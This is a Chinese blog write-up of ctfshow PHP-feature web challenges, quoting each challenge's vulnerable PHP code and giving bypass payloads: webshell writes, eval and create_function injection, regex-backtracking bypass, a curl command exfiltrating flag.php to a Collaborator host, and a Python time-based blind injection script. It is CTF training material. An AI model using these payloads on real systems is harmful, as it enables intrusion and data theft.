ctfshow-php特性

于 2024-03-07 19:09:12 发布
阅读量908 收藏 18
点赞数 16
文章标签: php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hungry1234/article/details/136543171
版权

大佬文章

intval 的绕过

正则匹配

sha1md5 的绕过

php 运算符优先级

php://fliter 的各种过滤器

正则匹配的回溯

php 正则匹配最大回溯

linuxcurl命令用法

无回显 rce 的总结

命令执行总结

  • 本文中引用的所有文章都在上面了,感谢各位大佬!

web96

if(isset($_GET['u'])){
    if($_GET['u']=='flag.php'){
        die("no no no");
    }else{
        highlight_file($_GET['u']);
    }
}
  • ./ 表示当前目录,故 u=./flag.php 即可

web97

if (md5($_POST['a']) === md5($_POST['b']))
  • md5 函数传入数组时候会返回 NULL,故传入两个数组即可

web99

<?php
highlight_file(__FILE__);
$allow = array();
for ($i=36; $i < 0x36d; $i++) { 
    array_push($allow, rand(1,$i));
}
if(isset($_GET['n']) && in_array($_GET['n'], $allow)){
    file_put_contents($_GET['n'], $_POST['content']);
}
>
  • 源码中 in_array函数 没有第三个参数(严格检查),这样只会进行弱类型比较,不会检查数据类型。

因此会将如 60shell.php 识别为 60 后再进行检查。所以令 n=60shell.php,之后写入木马,多刷新几遍即可

web100

<?php
highlight_file(__FILE__);
include("ctfshow.php");
//flag in class ctfshow;
$ctfshow = new ctfshow();
$v1=$_GET['v1'];
$v2=$_GET['v2'];
$v3=$_GET['v3'];
$v0=is_numeric($v1) and is_numeric($v2) and is_numeric($v3);
if($v0){
    if(!preg_match("/\;/", $v2)){
        if(preg_match("/\;/", $v3)){
            eval("$v2('ctfshow')$v3");
        }
    }
}
?>

所以检查时候只要 v1 是数字,然后利用 v2v3 来注释掉中间的 ctfshow 即可

web101

比上一题多过滤了好多

直接 echo new Reflectionclass('ctfshow'); 即可

web102

highlight_file(__FILE__);
$v1 = $_POST['v1'];
$v2 = $_GET['v2'];
$v3 = $_GET['v3'];
$v4 = is_numeric($v2) and is_numeric($v3);
if($v4){
    $s = substr($v2,2);
    $str = call_user_func($v1,$s);
    echo $str;
    file_put_contents($v3,$str);
}
else{
    die('hacker');
}
  • php5is_numberic 可以识别 16 进制,而 php7 不行

考虑 v1=hex2str(十六进制转码),这样就可以把任意的代码通过 v2 写入指定文件了

只不过对 v2is_numbertic 检查十分讨厌,只有 <?=`cat *`; 经过 base64 编码后的字符串满足条件

考虑 v3=php://filter/wrrite=convert.base64-decode/resource=1.php,之后访问 1.php 即可

web105

include('flag.php');
error_reporting(0);
$error='你还想要flag嘛?';
$suces='既然你想要那给你吧!';
foreach($_GET as $key => $value){
    if($key==='error'){
        die("what are you doing?!");
    }
    $$key=$$value;
}
foreach($_POST as $key => $value){
    if($value==='flag'){
        die("what are you doing?!");
    }
    $$key=$$value;
}
if(!($_POST['flag']==$flag)){
    die($error);
}
echo "your are good".$flag."\n";
die($suces);
  • $$keyphp 中相当于 $($key)(比如说 $key=a的情况下 $$key 相当于 $a)

这样 get 请求为 x=flagpost 请求为 error=x 即可

复盘时看到了一种有意思的解法,只发送 get请求:suces=flag&flag=,这样子会直接输出 $suces,从而得到 flag

web106

web108

include("flag.php");

if (ereg ("^[a-zA-Z]+$", $_GET['c']===FALSE)  {
    die('error');
}
//只有36d的人才能看到flag
if(intval(strrev($_GET['c']))==0x36d){
    echo $flag;
}
  • ereg 函数存在 %00 截断的漏洞

因此直接 ?c=%00778 即可

web109

highlight_file(__FILE__);
error_reporting(0);
if(isset($_GET['v1']) && isset($_GET['v2'])){
    $v1 = $_GET['v1'];
    $v2 = $_GET['v2'];

    if(preg_match('/[a-zA-Z]+/', $v1) && preg_match('/[a-zA-Z]+/', $v2)){
            eval("echo new $v1($v2());");
    }

}

php 原生类利用

  • __toString:当一个对象被当作字符串对待的时候,会触发这个魔术方法

需要找到含有 __toString 方法的原生类,之后令 v2=system('cat flag') 即可输出

原代码为 $v2(),意思是将 v2 的结果当作函数名调用所以没有影响

web110

大概比上面那个多过滤了好多符号,反正括号和引号是不能用了

通过以上两个的结合,可知 flag 的名字,之后直接访问即可

web111

  • GLOBALS:引用全局作用域中可用的全部变量

web112

当然,这题可以不用过滤器

web113

highlight_file(__FILE__);
error_reporting(0);
function filter($file){
    if(preg_match('/filter|\.\.\/|http|https|data|data|rot13|base64|string/i',$file)){
        die('hacker!');
    }else{
        return $file;
    }
}
$file=$_GET['file'];
if(! is_file($file)){
    highlight_file(filter($file));
}else{
    echo "hacker!";
}
  • is_file 函数漏洞:函数处理目录长度有某个限制,超过这个限制即可

/proc/self/root 是指向根目录的连接,多次重复这个即可

web126

error_reporting(0);
highlight_file(__FILE__);
include("flag.php");
$a=$_SERVER['argv'];
$c=$_POST['fun'];
echo $a[1];
if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g'])){
    if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\%|\^|\*|\-|\+|\=|\{|\}|\"|\'|\,|\.|\;|\?|flag|GLOBALS|echo|var_dump|print|g|i|f|c|o|d/i", $c) && strlen($c)<=16){
         eval("$c".";");  
         if($fl0g==="flag_give_me"){
             echo $flag;
         }
    }else{
        echo "hacker";
    }
}

$_SERVER['argv'] 可以读取 get 传参的内容。考虑和 pause_str 一起使用,将传入的参数解析成一个数组即可(或者和 assert 一起使用)

web127

  • $_SERVER['QUERY_STRING'] 不会进行 urldecode$_GET 会,所以用 url 编码绕过即可

web128

$f1 = $_GET['f1'];
$f2 = $_GET['f2'];
if(check($f1)){
    var_dump(call_user_func(call_user_func($f1,$f2)));
}else{
    echo "嗯哼?";
}
function check($str){
    return !preg_match('/[0-9]|[a-z]/i', $str);
}

  • gettext():返回字符串的函数

    get_defined_vars():返回由所有已定义变量所组成的数组

_() 可以代替 gettext,这样就绕过了对第一个参数的检查

web131

include("flag.php");
if(isset($_POST['f'])){
    $f = (String)$_POST['f'];
    if(preg_match('/.+?ctfshow/is', $f)){
        die('bye!');
    }
    if(stripos($f,'36Dctfshow') === FALSE){
        die('bye!!');
    }
    echo $flag;
}

  1. php 正则匹配:

    • 贪婪模式:匹配结果出现多种情况时,选择最长的那个

    • 懒惰模式:匹配结果出现多种情况时,选择最短的那个(由 ? 修饰)

  2. 正则匹配的回溯:正则匹配时会对匹配成功的字串进行压栈,以便于失配后的状态回溯

  3. php 正则匹配最大回溯:当压栈数量超过 php 设定最大值时,会直接停止匹配

题目中正则表达式 +? 会出现最大回溯超过设定值的问题,如果在字符串 36Dctfshow 前加上好多其他的字符,会导致 preg_match 返回 false 从而达到绕过的效果

web132

  • php 逻辑运算符短路:

    false && ...&& 后面的不会执行

    true || ...|| 后面的不会执行

web133

error_reporting(0);
highlight_file(__FILE__);
//flag.php
if($F = @$_GET['F']){
    if(!preg_match('/system|nc|wget|exec|passthru|netcat/i', $F)){
        eval(substr($F,0,6));
    }else{
        die("6个字母都还不够呀?!");
    }
}

考虑上传 `$F`,其中反引号是 shell_exec() 的缩写,这样就可以实现对 $F 的自我调用,从而达到命令执行

构造 $F 前六位为 `$F%20`;,这样相当于执行 eval(shell_exec($F););。然后在这六位后面加上想要执行的命令即可

发现这题是无回显 rce,考虑将 flag 外带。在 burpsuite 上的 collaborator 插件申请一个子域名,之后用 curl -F hungry=flag.php [子域名] 这样的语句就能把 flag.php 发送到自己的服务器上了

web135

if($F = @$_GET['F']){
    if(!preg_match('/system|nc|wget|exec|passthru|bash|sh|netcat|curl|cat|grep|tac|more|od|sort|tail|less|base64|rev|cut|od|strings|tailf|head/i', $F)){
        eval(substr($F,0,6));
    }else{
        die("师傅们居然破解了前面的,那就来一个加强版吧");
    }
}

过滤的不严,直接用类似于 ca''t flag.php > 1.txt 的命令就能把 flag.php 写入到其他文件中

web136

function check($x){
    if(preg_match('/\\$|\.|\!|\@|\#|\%|\^|\&|\*|\?|\{|\}|\>|\<|nc|wget|exec|bash|sh|netcat|grep|base64|rev|curl|wget|gcc|php|python|pingtouch|mv|mkdir|cp/i', $x)){
        die('too young too simple sometimes naive!');
    }
}
if(isset($_GET['c'])){
    $c=$_GET['c'];
    check($c);
    exec($c);
}
else{
    highlight_file(__FILE__);
}

标准解法使用 tee 命令替换 >,将所需执行的命令写入其他文件中并读取

还有一个很有意思的解法是直接对源码进行修改

ls | xargs sed -i "s/die/echo/"

ls | xargs sed -i "s/exec/system/"

大概意思是对于目录下的所有文件,把文件中的 die 转化为 echoexec 转化为 system,之后直接命令执行即可

web139

web136 的加强版,这里没有写的权限了

考虑时间盲注,这个是我的判断语句(其中 th 是所求字符串的第几个字符,c 是可能的字符集):
if [ `cat /f149_15_h3r3|args| awk \"NR==1 \"| cut -c {th}` == \"{c}\" ];then sleep 2;fi

粘上脚本

import requests
import time
import string
all_str = string.ascii_letters + string.digits + "\{\}_-<?>"
print(all_str)
url = "http://49c10546-c240-4770-9a4d-6344ac375b3e.challenge.ctf.show/?c="
def decode(line, th):
    for c in all_str:
        payload = f"if [ `cat /f149_15_h3r3|xargs| awk \"NR=={line} \"| cut -c {th}` == \"{c}\" ];then sleep 2;fi"
        try:
            requests.get(url + payload, timeout = 0.5)
        except:
            return c
    return " "
        
        
if __name__ == '__main__':
    print(requests.get(url=url).elapsed.total_seconds())
    line = 1
    length = 100
    for i in range(1, line + 1):
        print(f"line {i} begin!")
        ans = ""
        for j in range(1, length + 1):
            ans = ans + decode(i, j)
            print(ans)
#ctfshow 7e3cc34b-cd5d-4bbc-8250-39c7720c6188

web140

web147


highlight_file(__FILE__);

if(isset($_POST['ctf'])){
    $ctfshow = $_POST['ctf'];
    if(!preg_match('/^[a-z0-9_]*$/isD',$ctfshow)) {
        $ctfshow('',$_GET['show']);
    }

}

  1. 命令执行总结:文章里面介绍了 create_function 函数的注入

  2. php 所有原生函数都在 \ 命名空间中

考虑 create_function 注入:

ctf = \create_function

show = }system("cat flag");/*

即可

hungry1234
关注
  • 16
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTFshow php特性
m0_57114395的博客
04-29 552
web135 <?php /* # -*- coding: utf-8 -*- # @Author: Firebasky # @Date: 2020-10-13 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-10-16 18:48:03 */ error_reporting(0); highlight_file(__FILE__); //flag.php if($F = @$_GET['F']){ ...
ctfshow php特性 web112
U_U520的博客
12-05 522
考点:php伪协议 绕过is_file+highlight_file 对于文件的检测 我们的目的是即不能让is_file检测出是文件,还要让 highlight_file可以识别为文件。这时候可以利用php伪协议。 可以直接用不带任何过滤器的filter伪协议 也可以用一些没有过滤掉的编码方式和转换方式 还有一些可以编码的,比如base64编码convert.base-encode64部分可以二次编码绕过(包含调用 时会解一次码)
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
CTFSHOW-php特性
灰太的表格的博客
02-23 206
web89 intval():成功时返回 var 的 integer 值,失败时返回 0。 空的 array 返回 0,非空的 array 返回 1。 preg_match传数组返回为false payload:?num[]=a web90 ?num=0x117c web91 Apache HTTPD 换行解析漏洞(CVE-2017-15715) 正则表达式中的 $与^ apache这次解析漏洞的根本原因就是这个 $,正则表达式中,我们都知道$用来匹配字符串结尾位置,我们来看看菜鸟教程中对正则表达符$的
CTFshow-php特性
qq_61376069的博客
01-25 513
CTFshow入门—php特性。intval()函数、强比较;preg_match正则表达式匹配;strpos() 函数;MD5值比较绕过;php三元运算符;php运算符优先级
ctfshow---php特性
fainpo的博客
04-02 1222
使用此管道符“|”可以将两个命令分隔开,“|”左边命令的输出就会作为“|”右边命令的输入,此命令可连续使用,第一个命令的输出会作为第二个命令的输入,第二个命令的输出又会作为第三个命令的输入,依此类推。就是比如get传入a=1第一个foreach的$key就是a,$value就是1,利用die($error) 这里退出会输出$error,所以将flag的值赋值给他就能得到flag,当然第一个if不让,所以我们利用一个跳板。_()==gettext() 是gettext()的拓展函数,开启text扩展。
CTFshow-PHP特性89-90
weixin_51706044的博客
09-29 785
web89 if(isset($_GET['num'])){<br /> $num = $_GET['num'];<br /> if(preg_match("/[0-9]/", $num)){ //正则匹配参数不能为0-9<br /> die("no no no!");<br /> }<br /> if(intval($num)){ //返回num参数的值是,整数型<br /> echo $flag;<br /> }&lt.
php特性<1>--ctfshow
unexpectedthing的博客
11-01 642
文章目录1.数组绕过正则表达式web892.intvalweb90,92,93,94,953.正则表达式修饰符web91利用回溯最大次数绕过正则表达式4.路径问题web965.md5绕过强类型比较弱类型比较md5碰撞第四种情况其他的hash值(md4,CRC32)web976.三目运算符web987.变量覆盖前言$$使用不当extract()函数使用不当parse_str()函数使用不当import_request_variables()使用不当8.对preg_replace的研究9.in_array的特性
CTF中的PHP特性
qq_45086218的博客
02-26 4105
文章目录正则表达式元字符模式修正符preg_match()数组绕过换行绕过intval()字符绕过科学计数法进制转换小数点绕过strpos()md5强类型比较弱类型比较md5碰撞file_put_contents()in_array()优先级 本文以ctf.show网站题目为例,总结ctf中的php特性 正则表达式 元字符 模式修正符 preg_match() 数组绕过 preg_match()只能处理字符串,当传入的subject是数组时会返回false if(preg_match("/[0-9]/
ctfshow php特性
weixin_63231007的博客
05-30 844
web93 $num = $_GET['num']; if($num==4476){ die("no no no!"); } if(preg_match("/[a-z]/i", $num)){ die("no no no!"); } if(intval($num,0)==4476){ echo $flag; }else{ echo intval($num,0); } 使用进制计算:
[ctfshow]php特性练习一
qq_61109509的博客
02-11 1131
目录 web89 web90 web91 web92 web93 web94 web95 web96 web97 web98 web99 PHP手册 web89 if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag;
WEB攻防-PHP特性-学以致用
luffysec的博客
01-11 4443
学习笔记-WEB攻防-PHP特性-学以致用
ctfshow-VIP题目-Web-详细解题思路
01-27
CTFSHOW-VIP题目-Web-详细解题思路 本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制...
ctfshow-web41~60-WP
最新发布
02-21
ctfshow-web41~60-WPctfshow-web41~60-WP
CTFShow-周末大挑战parse-url篇Writeup
05-19
base64,PD9waHAgc3lzdGVtKCRfUE9TVFtBXSk7Pz4=`是Base64编码的PHP代码,解码后执行系统命令。这里的`$_POST[A]`代表了从POST请求中获取的变量A,可以用来传递命令。 第四关和第一关很相似,仍然是命令注入,通过`...
PHP特性(网友根据ctfshow整理)1
08-03
以下是一些重要的PHP特性及其详细解释: 1. **弱类型与`==`比较**: PHP支持弱类型,这意味着在进行比较时,不同类型的数据可以被自动转换成相同类型。例如,字符串"123"与整数123使用`==`比较时,它们被视为相等...
CTFshow刷题日记-WEB-PHP特性(上篇89-115)
Love&Share
09-05 3452
Part1 有关 intval() 函数的绕过技巧 web89 clude("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } 能被intval
ctfshow-web入门-php特性
qq_43618536的博客
07-11 1251
ctfshow-web入门-php特性
[MRCTF2020]套娃 看答案几乎懂了
zxnimud5的专栏
09-12 804
代码审计 绕过 _ 可以用空格或者点. <!-- //1st $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){ die('Y0u are So cutE!'); } if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_...
CTFShow-Web6
09-06
根据提供的引用内容,CTFShow-Web6可能是一个数据库名。其中,通过注入语句查询数据库web2中的表信息,得到两张表flag和user。具体的注入语句如下所示: ``` username=1'/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema=database()#&password=1 ``` ``` username='/**/or/**/1=2/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema='web2'#&password=123 ``` 通过这些注入语句可以得到数据库web2中的两张表信息,分别为flag和user。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [CTFshow之web6](https://blog.csdn.net/zzwwhhpp/article/details/116498386)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *3* [ctfshow-web6](https://blog.csdn.net/weixin_52497013/article/details/122095160)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值